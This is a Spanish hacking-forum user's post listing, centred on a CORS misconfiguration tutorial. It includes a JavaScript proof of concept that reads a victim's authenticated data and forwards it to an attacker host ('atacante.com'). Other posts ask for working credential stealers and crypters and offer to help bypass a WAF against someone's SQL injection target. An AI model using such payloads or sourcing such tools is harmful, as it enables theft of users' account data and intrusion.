buen post bro gracias por mantenernos informados yo no tenia idea del phishing enviando pdf es buena idea, salu2
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#21
Noticias Informáticas / Re:Kaspersky Lab registra un alza de 60% en ataques cibernéticos en América Latina
Agosto 21, 2018, 11:45:47 PM #22
Hacking / Re:[TUTORIAL] Bitacora de un Novato v2.0 ( Information Gathering )
Agosto 17, 2018, 12:19:14 AM
estan muy bien tus post son procesos que se deben realizar siempre al comenzar un pentest, saludos buen post
#23
Seguridad web y en servidores / CORS mal configurado? (Intercambio de recursos de origen cruzado)
Agosto 08, 2018, 04:51:49 AMDefinición
CORS o intercambio de recursos de origen cruzado, es un mecanismo que permite que recursos restringidos (como por ejemplo, las tipografías) de una pagina web puedan ser solicitados desde un dominio diferente por fuera desde el cual el primer recurso fue expuesto.
Acerca de la vulnerabilidad y como funciona CORS
Los sitios web normalmente habilitan CORS en el mismo origen de la web:
Código: php
Esto significa que las peticiones que hagan ellos desde otro lugar no se ejecutan ya que estas solo se permiten en el origen del encabezado.
En esta imagen podemos ver un ejemplo de como si hacemos una petición que no venga del origen (o que no quiera compartir con ese origen)que le indicamos la respuesta es bloqueada. Pero en dado caso que si queramos compartir con ese origen la respuesta se realiza:
El servidor también puede habilitar lo que son las credenciales utilizando el siguiente encabezado:
Código: php
Ahora, cuando confiamos en 1 solo origen es muy fácil, pero que pasa si deseamos confiar en mas origenes, esto se da mucho en las No tienes permitido ver los links. Registrarse o Entrar a mi cuentahoy en dia, en las cabeceras se puede agregar uno o mas origenes utilizando un espacio:
Código: php
También se puede hacer uso del comodín * para especificar todos los subdominios, esto no indica que nosotros no podamos crear un subdominio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta mientras que este ataque podría permitir ver sus recursos compartidos, o simplemente si el dominio tiene en su lista blanca podemos ponernos a pensar formas de evasión
.
Código: php
Esto peligra cuando usamos * en CORS ya que esta es una mala implementacion la cual deshabilita simplemente el uso de las credenciales aunque estas estén en Verdadero, esto lo podemos ver como lo explica la pagina de Mozilla.
Entonces explicando esto, si usted ve un servidor o pagina web que emite la cabecera CORS con * el comodin deja lugar a que un atacante pueda especificar en la cabecera el Origen que el desee tal como:
Código: php
Como resultado podemos ver recursos de otros sitios que no deberíamos poder ver.
Atacar CORS? Poc?
Entonces, esto de que me sirve? bueno pues gracias a que podemos hacer peticiones donde no deberíamos podemos simplemente hacer un Logger de peticiones que siempre este a la escucha, o simplemente hacer una petición para ver si funciona.
Primero, hacemos una petición y vemos si acepta nuestro origen.
Y después vemos la respuesta que nos da la cual permite nuestro dominio.
Digamos que esa peticion, es una donde se muestran los datos del usuario asi como sus credenciales.
Podemos hacer un poc y ver como funciona:
Código: javascript
Esto nos puede dar como resultado, los datos desde cualquier origen.
Siendo asi podemos crear un logger que nos vaya guardando todos los datos.
Código: javascript
Esto es como cuando robas cookies.
El origen Nulo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
La especificacion menciona que esta siendo activada por redirecciones, y algunas publicaciones de stackoverflow mustran que los archivos locales HTML tambien la obtienen. Esto hace que muchos sitios web lo tengan en su lista blanca:
Código: php
Entonces esto realmente es explotable?
Gracias No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Conclusión
En conclusion configurar correctamente tus cabeceras tal como CORS puede evitarte que tengas fugas de informacion de tu pagina web y otras personas puedan acceder a tus recursos.
Referencias:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
CORS o intercambio de recursos de origen cruzado, es un mecanismo que permite que recursos restringidos (como por ejemplo, las tipografías) de una pagina web puedan ser solicitados desde un dominio diferente por fuera desde el cual el primer recurso fue expuesto.
Acerca de la vulnerabilidad y como funciona CORS
Los sitios web normalmente habilitan CORS en el mismo origen de la web:
Access-Control-Allow-Origin: https://ejemplo.comEsto significa que las peticiones que hagan ellos desde otro lugar no se ejecutan ya que estas solo se permiten en el origen del encabezado.
En esta imagen podemos ver un ejemplo de como si hacemos una petición que no venga del origen (o que no quiera compartir con ese origen)que le indicamos la respuesta es bloqueada. Pero en dado caso que si queramos compartir con ese origen la respuesta se realiza:
El servidor también puede habilitar lo que son las credenciales utilizando el siguiente encabezado:
Access-Control-Allow-Credentials: trueAhora, cuando confiamos en 1 solo origen es muy fácil, pero que pasa si deseamos confiar en mas origenes, esto se da mucho en las No tienes permitido ver los links. Registrarse o Entrar a mi cuentahoy en dia, en las cabeceras se puede agregar uno o mas origenes utilizando un espacio:
Access-Control-Allow-Origin: http://ejemplo1.com http://ejemplo1.netTambién se puede hacer uso del comodín * para especificar todos los subdominios, esto no indica que nosotros no podamos crear un subdominio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta mientras que este ataque podría permitir ver sus recursos compartidos, o simplemente si el dominio tiene en su lista blanca podemos ponernos a pensar formas de evasión
. Access-Control-Allow-Origin: *.ejemplo.comEsto peligra cuando usamos * en CORS ya que esta es una mala implementacion la cual deshabilita simplemente el uso de las credenciales aunque estas estén en Verdadero, esto lo podemos ver como lo explica la pagina de Mozilla.
Entonces explicando esto, si usted ve un servidor o pagina web que emite la cabecera CORS con * el comodin deja lugar a que un atacante pueda especificar en la cabecera el Origen que el desee tal como:
curl https://victima.com -H "Origin: https://atacante.com" -IComo resultado podemos ver recursos de otros sitios que no deberíamos poder ver.
Atacar CORS? Poc?
Entonces, esto de que me sirve? bueno pues gracias a que podemos hacer peticiones donde no deberíamos podemos simplemente hacer un Logger de peticiones que siempre este a la escucha, o simplemente hacer una petición para ver si funciona.
Primero, hacemos una petición y vemos si acepta nuestro origen.
Y después vemos la respuesta que nos da la cual permite nuestro dominio.
Digamos que esa peticion, es una donde se muestran los datos del usuario asi como sus credenciales.
Podemos hacer un poc y ver como funciona:
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "https://target.com/user/", true);
xhttp.withCredentials = true;
xhttp.send();
}Esto nos puede dar como resultado, los datos desde cualquier origen.
Siendo asi podemos crear un logger que nos vaya guardando todos los datos.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerablecors.com',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='http://atacante.com/gracias.php?c='+this.responseText;
};Esto es como cuando robas cookies.
El origen Nulo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
La especificacion menciona que esta siendo activada por redirecciones, y algunas publicaciones de stackoverflow mustran que los archivos locales HTML tambien la obtienen. Esto hace que muchos sitios web lo tengan en su lista blanca:
Origin: nullEntonces esto realmente es explotable?
Gracias No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Conclusión
En conclusion configurar correctamente tus cabeceras tal como CORS puede evitarte que tengas fugas de informacion de tu pagina web y otras personas puedan acceder a tus recursos.
Referencias:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#26
Shells / Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
Julio 27, 2018, 01:18:47 PM
a lo mejor te interesa: No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
#27
Dudas y pedidos generales / Re:[DUDA] Escalar privilegios de usuario o averigüar/cambiar psw de AdminUser
Julio 05, 2018, 03:13:44 AM
intenta con mimikatz como dice blackdrake
te dejo un tuto que hice como referencia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
te dejo un tuto que hice como referencia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#28
Dudas y pedidos generales / Re:Sin derechos administrador en windows
Junio 25, 2018, 01:11:59 AM
ve a panel de control>cuentas de usuario>cuentas de usuario y verifica que tu usuario este como Administrador, si es posible muestranos una captura de pantalla, saludos
#29
Dudas y pedidos generales / Re:Reconexion Client/Servidor C#
Junio 25, 2018, 01:08:39 AM
deberia ser alreves bro que el cliente se conecte al servidor que el servidor solamente este en modo escucha, y si es posible que sea una ip fija o asignale un dominio... saludos
#30
Dudas y pedidos generales / Re:Como puedo rastrear un número telefónico y saber su ubicación
Junio 25, 2018, 01:01:19 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hace unos meses pense que era imposible pero es posible dependiendo de como lo quieras hacer por supuesto por interno te dejo una opción que tal ves te sirva.
si me puedes enviar a mi tambien me seria de utilidad, ya que lo que hago yo es ir a facebook y poner el numero aver si es de alguien o en google lo busco o hay una aplicacion que se llama true caller id que tambien tiene muchos numeros que te identifica pero estaria bien saber mas... saludos
#31
Dudas y pedidos generales / Re:stealer web y crypter
Junio 14, 2018, 05:26:51 PM
esta muy bien muchas gracias alguno de ellos que me recomiendes que soporte o explote los navegadores actuales algun stealer? saludos
#32
Dudas y pedidos generales / stealer web y crypter
Junio 13, 2018, 02:48:14 PM
hola en mi epoca existia el istealer 6.3 con el cual podias explotar y funcionaba ahora como los navegadores se actualizaron quisiera saber si todavia existe algun stealer como ese web y que funcione si me podrian recomendar alguno...
tambien habian paginas donde podias conseguir crypters no se si todavia anden o me puedan recomendar alguna
quise usar troyanos pero ahora es diferente ya que las compañias te cobran por abrir puertos ahora...
pero me gusta mas que anda que me recomendaran algun stealer web de antemano muchas gracias, saludos
tambien habian paginas donde podias conseguir crypters no se si todavia anden o me puedan recomendar alguna
quise usar troyanos pero ahora es diferente ya que las compañias te cobran por abrir puertos ahora...
pero me gusta mas que anda que me recomendaran algun stealer web de antemano muchas gracias, saludos
#33
Dudas y pedidos generales / Re:Problema en formulario Login (PHP)(HTML)
Marzo 05, 2018, 11:04:02 PM
tienes mal el condicional y la consulta, y en el HTML no veo tu envio de si es admin, saludos!
#34
Dudas y pedidos generales / Re:Ganar algo en paypal con Publicidad en Facebook
Julio 07, 2017, 11:40:18 PM
Lo mas normal es ofreciendo un producto que tengas.. ya sea una venta de un libro, un curso, referidos, un cpu, o lo que sea... es lo mas normal
#35
Dudas y pedidos generales / Re:Bypass Blind SQLi
Junio 20, 2017, 11:38:15 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tienes experiencia en WAF bypassing?No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
si me pasas el target te ayudo, saludos XD
si, hice el taller numero 4 aqui en underc0de: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
antes de hacer una consulta debes de ver como funciona el waf si te bloquea palabras si se atrasa en la respuesta... pueden suceder muchas cosas hasta redirecciones, si quieres publicar el target te ayudamos en el foro, saludos
#36
Dudas y pedidos generales / Re:Bypass Blind SQLi
Junio 20, 2017, 02:42:41 AM
si me pasas el target te ayudo, saludos XD
#38
Dudas y pedidos generales / Re:Placa madre quemada
Junio 11, 2017, 07:03:25 AM
Te comento lo primero que haria yo en ese caso seria limpiar esa tarjeta madre con Alcohol Isopropilico, al terminar de limpiarla.... Haria una analisis Visual (si tienes lupa mejor) para ver si le hace falta algun componente o esta sulfatado algun componente ... viendo los capacitores se ven en buena condicion... ahora a esa tarjeta le hace falta el northbridge un disipador... el disipador del pc... el cpu y las ram....
una fuente de poder y ponerle un procesador compatible y una ram compatible y ver si enciende para ello puentea pwr_sw .... (sin ponerle disipador toca el procesador si se caliente significa que esta funcionando el procesador... si hace pitidos normalmente son 3 la ram no esta funcionando bien)... lo primero que deberias de ver es si enciende o si da video... de ahi se puede checar lo siguiente...
una fuente de poder y ponerle un procesador compatible y una ram compatible y ver si enciende para ello puentea pwr_sw .... (sin ponerle disipador toca el procesador si se caliente significa que esta funcionando el procesador... si hace pitidos normalmente son 3 la ram no esta funcionando bien)... lo primero que deberias de ver es si enciende o si da video... de ahi se puede checar lo siguiente...
#39
Dudas y pedidos generales / Re:Metodo Put web Hacking
Junio 11, 2017, 06:50:39 AM
Un metodo PUT en HTTP es mas que nada para crear un recurso en el servidor....
En las apis es utilizado para actualizar la mayoria de las veces en la DB...
Entre otros metodos HTTP los mas comunes son GET y POST....
No hay forma silenciosa que yo sepa, no se si la verdad se pueda, pero lo mejor en estos casos seria utilizar un VPN para que te cifre las peticiones, o Usar TOR con Live Http Headers....
Saludos
En las apis es utilizado para actualizar la mayoria de las veces en la DB...
Entre otros metodos HTTP los mas comunes son GET y POST....
No hay forma silenciosa que yo sepa, no se si la verdad se pueda, pero lo mejor en estos casos seria utilizar un VPN para que te cifre las peticiones, o Usar TOR con Live Http Headers....
Saludos
#40
Back-end / Re:Escaner Masivo de Correos
Junio 11, 2017, 06:41:17 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Excelente trabajo brother...! La comprobación de los mails la realizas con preg_match o utlizas alguna función que comprueba si el mail está operativo.
Me explico por ejemplo lees todos los datos y todo lo que no termine en @gmail.com ó @outlook.com ,etc lo descarta gracias por tu tiempo.
Hola Hu3c0 muchas gracias! C: la comprobacion de email utilizo una funcion nativa de php:
filter_var($email,FILTER_VALIDATE_EMAIL)
donde la variable $email es el correo electronico, devuelve true si es valido
Sobre lo de descartar @gmail o @outlook seria mas que nada filtrado de correos, por dominio...
Lo que hace este escaner de correos es:
la existencia real de una dirección de correo electrónico utilizando MX-Records y el Protocolo simple de transferencia de correo (SMTP).
Utilizando la API de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por lo cual los correos existen realmente y puede comprobar cualquier tipo de dominio... @hotmail.com, @outlook.com, @gmail.com, @loquesea.com...
En caso de filtrado seria tomar el dominio hacer un arreglo y arrojarlo (en este caso si podria utilizarse expresiones regulares como lo comentas)
Saludos
